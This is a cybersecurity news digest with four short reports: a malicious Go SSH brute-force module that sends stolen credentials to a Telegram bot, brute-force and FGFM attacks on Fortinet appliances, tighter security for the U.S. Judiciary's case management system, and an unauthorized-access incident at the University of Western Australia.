Malicious Go Module Steals SSH Credentials via Telegram
A new supply-chain attack has emerged in the Golang ecosystem, where a malicious Go module masquerading as an SSH brute-force tool was discovered to be covertly exfiltrating credentials to an attacker via Telegram. This incident highlights an increasing trend of attackers abusing open source package repositories to target infrastructure and cloud environments.
Technical Overview
The module, named “Golang random IP SSH brute force,” claimed to be a tool for brute-forcing SSH services but was found to contain embedded routines for credential theft. When executed, it scans random IPv4 addresses for accessible SSH services on TCP port 22, attempting authentication using an internal list of username-password pairs.
Exfiltration Mechanism
Upon a successful login, the tool transmits the exploited IP address, along with the username and password, to a hardcoded Telegram bot under the attacker’s control. This exfiltration channel relies on Telegram as a command-and-control infrastructure, evading traditional network security monitoring due to encrypted, legitimate-appearing traffic.
Threat Actor Infrastructure
The associated GitHub account that distributed the malicious package has been taken down. However, the tool’s methodology—combining credential theft, SSH brute forcing, and discreet exfiltration—remains a model for future supply chain threats targeting systems highlighted by the prevalence of Go-based software in DevOps and backend operations.
Defensive Measures
Organizations relying on open source components are advised to vet external code and enforce strict repository sources. Network monitoring for anomalous traffic to Telegram and the restriction of outbound messaging services from critical infrastructure are recommended. Detection strategies should also focus on large-scale scanning activities and code audits for hidden network calls within packaged binaries.
Surge in Brute Force and FGFM Protocol Attacks Against Fortinet SSL VPNs and FortiManager
Security researchers have recorded a pronounced uptick in targeted brute-force attacks and exploitation attempts using the Fortinet Group Fabric Management (FGFM) protocol against Fortinet SSL VPNs and FortiManager appliances. This pattern often correlates with forthcoming vulnerability disclosures and active exploitation campaigns in the wild.
Attack Methodology
Attackers have been observed launching multiple waves of brute-force campaigns, targeting external-facing SSL VPN devices and management platforms. These attacks typically leverage widespread password spraying and interface fingerprinting to identify unpatched or weakly secured Fortinet appliances.
Recent Vulnerabilities and Proof-of-Concept Code
The surge coincides with the public release of proof-of-concept exploits for new vulnerabilities, including unauthenticated OS command injection. Security teams are warning that sophisticated threat actors may pivot quickly to leverage zero-days or newly disclosed issues in rapid exploitation cycles.
Mitigation Strategies
Administrators are strongly urged to patch all Fortinet products, implement multifactor authentication on VPN access, and review remote management interface exposure. Network defenders should monitor for repeated authentication failures, unusual management traffic, and the use of unexpected FGFM protocol activity that could indicate lateral movement or unauthorized device configuration.
Federal Judiciary Increases Case Management System Protections Following Persistent Cyberattacks
In response to a series of sophisticated and persistent cyberattacks targeting its electronic case management system, the U.S. Judiciary is implementing heightened security protocols to protect sensitive court documents and ensure the continuity of judicial operations.
Attack Context and Targets
Recent intrusions demonstrate targeted efforts to access sealed, confidential, or otherwise sensitive legal filings. While the majority of case documents are public, targeted actors are focusing on those under restricted access, increasing the risk of inadvertent exposure or abuse of proprietary legal information.
Security Enhancements and Partnerships
The Judiciary has expanded technical safeguards, increased monitoring, and strengthened authentication controls for highly sensitive documents. It is collaborating closely with Congress and multiple federal agencies, including the Department of Justice and the Department of Homeland Security, to adopt best practices and coordinated incident response actions across the judicial branch.
Modernization Initiatives
Ongoing investments have been directed at modernizing IT systems, increasing the detection of sophisticated threats, and implementing rigorous access control audits. The Judiciary reiterates its commitment to transparency for public legal records while ensuring robust confidentiality measures for sensitive filings mandated by law.
University of Western Australia Investigates Cybersecurity Incident Involving Unauthorized Access
The University of Western Australia (UWA) is investigating a cybersecurity incident that resulted in unauthorized access to university systems. The breach comes amid a global rise in attacks targeting educational institutions and research data repositories.
Incident Details
The incident was confirmed by UWA’s IT services following detection of unusual activity on its network infrastructure. Initial assessments point toward unauthorized access, though the full scope and impact, including any compromised data or services, is still under internal review.
Response and Containment
UWA promptly initiated incident containment procedures, engaged cybersecurity specialists, and notified relevant authorities. The university is conducting a forensic investigation to determine the attack vector, assess data exposure, and identify corrective actions to fortify its digital environment.
Impact on Academic Operations
While some IT services may experience temporary disruptions as containment measures are enforced, UWA has stated that core academic and administrative functions are being prioritized for rapid restoration. Notifications and guidance have been issued campus-wide to support awareness and vigilance against potential follow-up attacks.